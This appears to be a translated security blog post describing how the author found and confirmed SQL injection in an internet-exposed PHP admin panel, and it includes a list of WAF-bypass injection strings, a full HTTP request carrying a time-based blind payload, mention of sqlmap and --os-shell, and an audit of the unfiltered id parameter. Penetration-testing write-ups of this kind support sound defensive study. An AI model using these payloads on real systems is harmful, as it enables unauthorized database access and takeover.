1. Backend - SQL injection vulnerability (1)

Preface

In the vast field of software or application testing, black-box and white-box testing are two core testing methods that provide solid support for the quality assurance of web applications with their unique perspectives and methods. Black-box testing focuses on functional verification, while white-box testing delves into the code internally to ensure the correctness of the logic. This article aims to explore how to effectively combine black-box and white-box testing and share practical experience through the callback system assets exposed to the public network.

The theoretical basis of black-box and white-box testing respectively originates from the analysis of software functions and internal structures. Black-box testing, like an uninformed user, evaluates the functionality of the software solely through its input and output. White-box testing, on the other hand, ensures that every line of code is scrutinized by checking the logical paths, data flows, parameters, usage, and so on of the program.

Preparation

To alleviate manual auditing, tools can be used to replace it!

Firstly:

Seay Source Code Audit System is an open-source code audit tool that has received extensive attention and use by security professionals. It can help developers and security personnel quickly discover potential security vulnerabilities in web applications, including SQL injection, cross-site scripting (XSS), file inclusion, and other common vulnerabilities.

1719057481_6676bc49b227a26a08791.png!small?1719057482808

Secondly:

Fortify is a powerful static code analysis tool developed and maintained by Micro Focus. It can help developers and security teams comprehensively scan the source code of applications, discover various security vulnerabilities, including injection attacks, cross-site scripting, access control defects, and so on.

1719057714_6676bd329fbb200971f31.png!small?1719057715307

1. Backend - SQL injection vulnerability (1)

The methods for judging SQL injection mainly include the following:

Numeric injection:When the input parameter is of integer type, there may be a numeric injection vulnerability. Determine whether there is a vulnerability by trying to input different values. For example, input '1' or 'and 1=1' and 'and 1=2', and observe whether there is any change in the result. If the result is different, there may be a numeric injection.
Character-based injection:When the input parameter is a string, there may be a character-based injection vulnerability. By trying to input different strings to determine whether there is a vulnerability. For example, input 'admin' and 'admin' and 1=1 --, observe whether there is a change in the result. If the result is different, there may be a character-based injection.
Other types of injection:In addition to numeric and character-based injection, there are other types of injection, such as search-based injection, Cookie injection, POST injection, etc. These types of injection are usually different forms or injection positions from numeric and character-based injection.

Of course, in the early stage, if there are some difficult environments or someCharacters,SymbolsAnd filtering orWafAnd so on, you can try some methods to find hidden treasures, according to your favorite means, or use some recently disclosed Bypass syntax!

Bypassing condition checks using logical operators:
- For example, 'or'1'='1, 'or'a'='a
Bypassing condition checks using arithmetic operators:
- For example, '+'1'='1, '*'1'='1
Bypassing condition checks using string concatenation:
- For example, 'and'str'='str', 'and'chr(97)'='a
Bypassing condition checks using comment symbols:
- For example, '//and//1=1, '/!50000and/1=1
Bypassing defenses using hexadecimal encoding:
- For example, '%27and%27g%27=%27f', '%27or%271%27=%271
Bypassing condition checks using double negation:
- For example, 'and not('g'='f)', 'and not(1=2)

Returning to the main text, this callback system is developed purely in PHP language, which is relatively simple to develop, but too simple. After logging into the background and randomly clicking on the function, I did not find anything, but in the editing function, thick crab!

/admin/admininfo.php?id=1

1719043482_6676859a4d29d8e05c88f.png!small?1719043483766

It is almost found that the editing and modification function of each list exists with an example of this id method.

/admin/codeinfo.php?id=1

1718985968_6675a4f0001259b019ce3.png!small?1718985968868

Then, let's get to work. Using the ' symbol directly in the 'admininfo.php' modified by the site administrator under 'Site Management' caused an error. This is a typical method, quick and convenient!

1718986383_6675a68f0d83a96f6ab99.png!small?1718986386398

GET /admin/admininfo.php?id=1'and'g'='f';SELECT SLEEP(5)# HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: 1869f3da4f51f3cf057e5e1bfb43dfd2_ssl=1b634fc0-33c5-426d-b012-f4a8ab259f96.BihvnNQt-PttnGjOcnQU8ojbcew; 68c64d273cd94dc60d1a176456542de8_ssl=f7fd524a-8e31-4d3a-8ca7-308172377b35.jzPNyFewCgYPy6oPzK0ieM7MWCs; PHPSESSID=tqi04ejqhrs063k32u92a6lrmq
Priority: u=1
Referer: http://XXXXXXXXXX/admin/webset.php
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

1718989074_6675b1123b00b82b9b74b.png!small?1718989075465

Stored time blind injection, ran it with SQLMap before, hoping it won't take too long! OK, a few minutes and it's done! Not much time left

1718989657_6675b359a3218f91aa2b1.png!small?1718989660604

I wanted to use sqlmap --os-shell to write a shell, but I didn't have enough permissions and it was constipated!

SQL injection - code audit

require_once 'https://www.freebuf.com/articles/includes/common.php';
if ($adminData['adminStatus'] != 1) Tips::error('You do not have permission to access this page', '/admin');
if (empty($_GET['id'])) Tips::error('Parameter error', '/admin/adminlist.php');
if ($_GET['id'] == 1 && $adminData['id'] != 1) Tips::error('Cannot modify the chief general site administrator', '/admin/adminlist.php');

$id = $_GET['id'];
$editData = $adminClass->GetAdmin($id);

if (empty($editData)) Tips::error('The site administrator does not exist', '/admin/userlist.php');
if ($editData['adminStatus'] == 1 && $editData['id'] != $adminData['id'] && $adminData['id'] != 1) Tips::error('Cannot modify the same-level site administrator', '/admin/adminlist.php');

1719042739_667682b392be70348ff5f.png!small?1719042741276

The variable $_GET['id'] is directly obtained from the URL without any verification or defense filtering measures. The variable $id is directly passed to the method $adminClass->GetAdmin($id) and then followedGetAdminAt the path of \includes\class\admin.class.p

你可能想看：

From 0 to 1, this article is enough to collect SQL injection (sql ten injection types), technical analysis and practical training

Different SRC vulnerability discovery approach： Practical case of HTTP request splitting vulnerability

Ensure that the ID can be accessed even if it is guessed or cannot be tampered with; the scenario is common in resource convenience and unauthorized vulnerability scenarios. I have found many vulnerab

Announcement regarding the addition of 7 units as technical support units for the Ministry of Industry and Information Technology's mobile Internet APP product security vulnerability database

Eighth. Blind injection based on boolean header injection

AI Large Model Security： Prompt Injection Attack (Prompt Injection Attack)

DLL injection vs. Shellcode injection

CodeQL automated vulnerability detection getting started

I. The principle of SQL injection login

In-depth Analysis and Practice： Analysis of Apache Commons SCXML Remote Code Execution Vulnerability and POC EXP Construction

最后修改时间：2025-03-25 06:52:53